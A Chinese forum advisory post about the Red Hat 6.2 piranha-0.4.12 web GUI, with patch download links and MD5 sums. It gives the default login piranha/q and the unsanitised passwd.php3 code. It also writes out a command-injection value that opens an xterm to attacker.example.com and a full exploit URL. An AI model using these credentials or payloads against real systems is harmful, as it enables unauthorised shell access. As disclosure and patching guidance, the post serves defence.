精华区 [关闭][返回]
当前位置:网易精华区>>讨论区精华>>电脑技术>>● 计算机安全>>◆系统漏洞◆>>piranha 默认密码和可执行shell命令漏洞

主题:piranha 默认密码和可执行shell命令漏洞
发信人: williamlong()
整理人: williamlong(2000-05-09 12:52:10), 站内信件
  piranha是一个GUI界面的工具,用于监控,配置和管理LVS cluster。Redha
t 6.2的piranha-0.4.12安装包支持基于web的php3来保护基本的授权认证。并且
提供一个默认的帐号,如果能够知道就可以允许远程用户改变piranha的密码和执
行任意的命令,注意问题存在于passwd.php3脚本中。
  piranha-0.4.12安装包,存在两个基本的问题,可能导致攻击者获得shell接
入。由于早期版本只是单纯的GUI界面,而没有基于web的管理界面,所以不存在
该漏洞。
  第一个问题是保护管理脚本的默认的帐号和密码存在。 ISS称之为"backdoo
r" ,其实只是一般默认的用户名和密码而已。
默认的用户名/密码都是: piranha/q
  第二个问题是用户改变密码的passwd.php3脚本默认安装在/home/httpd/htm
l/piranha/secure目录中。在web中是:http://victim.example.com/piranha/s
ecure/passwd.php3一旦认证通过, 将会弹出一个表格要求输入新的密码。通过之
后,由于没有过滤机制,可能近一步获得shell命令权限。分析该文件如下:
passwd.php3:
echo "<TD>The passwords you supplied match<BR>";
$temp = `/usr/bin/htpasswd -b passwords piranha $try1`;
这将允许创建其它新密码。例如:
g23 ;/usr/X11R6/bin/xterm -display attacker.example.com:0 -ut;
那么构建该URL就应该如下:
http://victim.example.com/piranha/secure/passwd.php3?try1=g23+%3B+touc
h+%2Ftmp%2Fr00ted+%3B&try2=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&passwd=AC
CEPT
x86 RH 6.2用户升级补丁如下:
rpm -Fvh 文件名
Red Hat Linux 6.2:
intel:
ftp://updates.redhat.com/6.2/i386/piranha-0.4.14-1.i386.rpm
ftp://updates.redhat.com/6.2/i386/piranha-docs-0.4.14-1.i386.rpm
ftp://updates.redhat.com/6.2/i386/piranha-gui-0.4.14-1.i386.rpm
alpha:
ftp://updates.redhat.com/6.2/alpha/piranha-0.4.14-1.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/piranha-docs-0.4.14-1.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/piranha-gui-0.4.14-1.alpha.rpm
sparc:
ftp://updates.redhat.com/6.2/sparc/piranha-0.4.14-1.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/piranha-docs-0.4.14-1.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/piranha-gui-0.4.14-1.sparc.rpm
sources:
ftp://updates.redhat.com/6.2/SRPMS/piranha-0.4.14-1.src.rpm
MD5校验值如下:
MD5 sum Package Name
----------------------------------------------------------------------
-----
7c9cad243857f3e90cb73457619ad3a0 6.2/SRPMS/piraanha-0.4.14-1.src.rpm
179e502f88f149fe3bfb285af851a6d3 6.2/alpha/piranha-0.4.14-1.alpha.rpm

881622bc6403c2af38834c0deaf05d44 6.2/alpha/piranha-docs-0.4.14-1.alpha
.rpm
7ffc63ec6f236afc0b19298ec29e6774 6.2/alpha/piranha-gui-0.4.14-1.alpha.
rpm
1e04357c0ebb004185b834152667c644 6.2/i386/piranha-0.4.14-1.i386.rpm
5b6649f14979e1b2fbdb763d88e9a3ac 6.2/i386/piranha-docs-0.4.14-1.i386.r
pm
1a49816f280dc7a9b83ba9bab42a247f 6.2/i386/piranha-gui-0.4.14-1.i386.rp
m
4153b861f030a17745463c1749732b58 6.2/sparc/piranha-0.4.14-1.sparc.rpm

dc964993d9a3b6c967e5c4455bc24221 6.2/sparc/piranha-docs-0.4.14-1.sparc
.rpm
97071e07e2f34fecf80ba48f61e70ba6 6.2/sparc/piranha-gui-0.4.14-1.sparc.
rpm 

--
                                                
    ☆ 蓝色月光 ☆  http://williamlong.163.net  
                                                

※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 61.128.129.3]
[关闭][返回]